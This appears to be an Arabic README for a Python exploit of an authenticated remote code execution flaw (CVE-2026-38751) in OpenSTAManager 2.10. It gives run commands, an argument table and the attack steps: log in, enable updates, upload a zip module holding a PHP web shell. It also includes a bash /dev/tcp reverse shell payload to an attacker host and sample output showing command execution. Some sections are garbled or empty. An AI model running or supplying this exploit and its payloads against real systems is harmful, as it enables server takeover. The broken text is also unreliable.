
استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751)
يستغل هذا السكربت المكتوب بلغة Python ثغرة تنفيذ الأكواد عن بُعد (Remote Code Execution) في OpenSTAManager الإصدار 2.10، والمعروفة بـ CVE-2026-38751. يسمح هذا الاستغلال للمستخدمين المصادَق عليهم برفع وحدة خبيثة وتنفيذ أوامر تعسفية على النظام المستهدف.
يتبع الاستغلال الخطوات التالية:
MODULE)shell.php) ينفذ الأوامر عبر معامل GET باسم crequests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
| الوسيط | الوصف |
|---|---|
-u, --url | عنوان URL الهدف (مطلوب) |
-U, --user | اسم المستخدم للمصادقة (مطلوب) |
-P, --password | كلمة المرور للمصادقة (مطلوب) |
--interactive | الدخول إلى وضع الشل التفاعلي |
--no-cleanup | عدم إزالة ملفات الشل بعد التنفيذ |
--lhost | المضيف المحلي للشل العكسي |
--lport | المنفذ المحلي للشل العكسي |
shell/MODULE: ملف إعدادات الوحدةshell/shell.php: ويب شل PHP ينفذ الأوامر المُمرَّرة عبر معامل GET باسم cid للتأكد من أنه يعمليحاول الاستغلال استخدام عدة حمولات للشل العكسي:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ إخلاء مسؤولية: هذا الاستغلال مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط.
تتيح هذه الثغرة:
للحماية من هذه الثغرة:
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
يُقدَّم هذا الاستغلال للأغراض التعليمية فقط. يُعد الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها أمرًا غير قانوني.